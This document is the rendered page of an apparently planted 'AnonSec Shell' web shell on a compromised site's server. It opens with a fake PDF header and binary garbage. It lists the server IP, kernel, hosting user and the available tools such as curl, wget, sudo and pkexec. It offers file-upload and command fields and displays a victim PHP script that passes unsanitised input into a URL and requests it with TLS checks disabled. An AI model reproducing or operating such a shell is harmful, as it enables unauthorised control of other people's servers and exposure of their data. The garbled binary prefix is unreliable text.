%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/admin_dons/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/admin_dons/genereCerfa.php
<?php 
if(empty($_POST['id']) && empty($_GET['id'])) die('Error');

if(!empty($_POST['id'])) $id=$_POST['id'];
elseif(!empty($_GET['id'])) $id=$_GET['id'];

function do_curl()
{
	$args=func_get_args();
	
	$oCurl = curl_init();
	//Option: Url to call
	curl_setopt( $oCurl, CURLOPT_URL, $args[0]);

	if(!empty($args[1]))
	{
		//POST
		curl_setopt($oCurl, CURLOPT_POST, 1);
		curl_setopt($oCurl, CURLOPT_POSTFIELDS, $args[1]);
	}

	//Option: Do not display the result but store it in a variable
	curl_setopt( $oCurl, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($oCurl, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($oCurl, CURLOPT_SSL_VERIFYPEER, 0);
	
	//Launch Curl Request
	$sCurlResponse = curl_exec( $oCurl );
	
	$httpCode = curl_getinfo($oCurl, CURLINFO_HTTP_CODE);
	if($httpCode=="404") return "404";
	
	curl_close($oCurl);
	return $sCurlResponse;
}

$url="https://www.meirpanim.fr/stripe/public/success.php?test=".$id;
//echo $url; 
echo do_curl($url,'');


//var_dump(ini_get('disable_functions'));
?>

Anon7 - 2022
AnonSec Team